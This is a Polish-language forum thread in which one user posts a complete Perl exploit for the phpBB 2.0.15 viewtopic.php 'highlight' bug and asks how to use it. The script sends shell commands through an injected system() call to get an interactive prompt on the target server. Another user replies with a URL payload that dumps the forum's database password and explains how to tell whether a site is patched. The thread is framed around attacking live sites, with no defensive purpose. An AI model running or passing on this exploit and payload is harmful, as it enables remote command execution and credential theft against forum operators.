Exploit na phpb

[SaTaNiKa]

Jest sobie taki Exploit na forum w phpbb2_0_15 lub starsze poniżej przedstawiony kod exploita.
Exploit odpalany w linuxie.

#!/usr/bin/perl 

# Wed Jun 29 19:08:04 CEST 2005 [email][email protected][/email]

#

# phpBB 2.0.15 -re-bug in viewtopic.php

# The complete Open Source Development with CVS: GNU General Public License

# Book on using CVS effectively  <---------  cvs, is also GPL

# or [url]http://www.google.es/search?q=programming+howto[/url]

# 

# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!

# 

# 

# Example: ./phpbb2_0_15.pl [url]http://www.server.com/viewtopic.php?t=1[/url]

# You can start typing commands.

# Tested in BSD. Theo.. it works!

#

# !dSR: que todos los hackers digan YO!!

#

# 

 



use strict;

use IO::Socket;



unless ($ARGV[0]) { print "$0 <viewtopic url>n"; exit(1); }



$ARGV[0] =~ m!http://(.*?)/(.*?t=d+)!;

my ($server, $port) = split (/:/,$1);

$port   = 80 unless defined($port);

$server  = $1 unless defined($server);

my ($url, $command) = $2;



print "$server - $port - $urln";



while () {

        print "phpBB2.0.15> ";

        while(<STDIN>) {

                $command=$_;

                chomp($command);

                last;

        }

        &send($command);

}



sub send {

    my $ok        =    0;

    my $cmd        = "echo "#PHPBBEXPLOIT#";".$_[0].";echo "#PHPBBEXPLOIT#"";

    my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1n".

                    "Host: $servernPHP: $cmdnnnn";

    my $socket = IO::Socket::INET->new(PeerAddr => $server,

                                        PeerPort => $port,

                                        Proto    => "tcp",

                                        Type     => SOCK_STREAM)

                                or die "can't connect to: $server : $@n";

    print $socket $string;

    while(<$socket>) {

        if (/#PHPBBEXPLOIT#/) {

                close($socket) and last if $ok eq 2;

                $ok++;

                next;

        }

        print if $ok eq "1";

    }

}

exit 0;

Potem pokazuje mi sie coś takiego

[root@localhost satanika]# perl phpbb.sh [url]http://www.xxxxx.pl/viewtopic.php?t=828[/url]

[url]www.xxxxx.pl[/url] - 80 - viewtopic.php?t=828

phpBB2.0.15>

I nie wiem co dalej podejżewam że jakieś komendy ale nie znam zabardzo się na tym mógłby ktos pomuc prosze.
Z Góry wielkie dzięki za pomoc pozdro for all

 

[GreEnSnake]

Po prostu wpisz w przegladarce:
www.example.pl/phpBB/viewtopic.php?t=NUMERPOSTU&highlight='.printf($dbpasswd).'

 

[SaTaNiKa]

I co to da ?? zrobiłem tak i zonk

Zrobić tak z odpalnym skryptem czy jak ????

Mógłbym prosić o dokładniejszcz ewytłumaczenie ????
Z góry dzięki pozdro for all.

 

[GreEnSnake]

Originally posted by SaTaNiKa
I co to da ?? zrobiłem tak i zonk

Zrobić tak z odpalnym skryptem czy jak ????

Mógłbym prosić o dokładniejszcz ewytłumaczenie ????
Z góry dzięki pozdro for all.

dokladniejsze wytluamczenie =]

 

[SaTaNiKa]

Jeżeli to dobrze zinterpretowałem to w exploicie musze podać taki

http://www.example.pl/forum/viewtopic.php?...tf($dbpasswd).'

tak ????

Dzięki za pomoc GreEnSnake.

Pozdro for all

 

[GreEnSnake]

Originally posted by SaTaNiKa
Jeżeli to dobrze zinterpretowałem to w exploicie musze podać taki

http://www.example.pl/forum/viewtopic.php?...tf($dbpasswd).'

tak ????

Dzięki za pomoc GreEnSnake.

Pozdro for all

po co Ci exploit skoro mozesz wpisac to co podales w przegladarce:
http://www.example.pl/forum/viewtopic.php?...tf($dbpasswd).'
Jesli Ci sie nie wyswietlilo haslo to zanczy ze stronka jest zalatana... mam nadzieje ze wszystko wyjasnilem... =]

 

[DJBOSS666]

Mozliwe takze ze topic o numerku 50 nie istnieje

Pozdrawiam

DJBOSS666

 

[GreEnSnake]

Originally posted by DJBOSS666
Mozliwe takze ze topic o numerku 50 nie istnieje

Pozdrawiam

DJBOSS666

tja, podalem to tylko dla przykladu, a wyczaic jakis numerek topiku chyba nie trudno - wystarczy wejsc w jakis zalozony topik =]